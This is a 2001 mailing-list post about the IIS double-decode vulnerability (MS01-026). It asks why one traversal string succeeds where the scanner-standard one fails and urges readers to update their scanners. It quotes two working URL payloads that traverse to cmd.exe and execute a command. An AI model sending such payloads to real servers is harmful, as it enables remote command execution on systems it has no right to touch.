Vulnerability Development mailing list archives
double decode: to slash or not to slash.
From: Roelof <roelof () sensepost com>
Date: Wed, 4 Jul 2001 13:43:21 +0200 (SAST)
Hi all. Strange thing with double decode problem on IIS. Refer: http://www.microsoft.com/technet/security/bulletin/MS01-026.asp Most scanners (including the Nessus plugin) checks for the problem using the following string: /directory/..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir replace directory with an executable directory, and replace %255c with any combination of the double encoded string. It seems to work fine (I have seen this as the only vulnerability on a box and the scanner picks it up nicely) However...I have found two boxes (one IISv4 and one IISv5) where it does not work...the weird thing is this - the following string: /directory/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir DOES work. The only difference is the ../ in front of /winnt/system32/blah. A note - if you are using a scanner that only checks for the first string - please update - your site might be vulnerable. Arirang scanner does this check properly. Why is this so? Are there two different problems here? Any comments? Regards, Roelof.
Current thread:
- double decode: to slash or not to slash. Roelof (Jul 04)
- Re: double decode: to slash or not to slash. H D Moore (Jul 04)
- Re: double decode: to slash or not to slash. warning3 (Jul 04)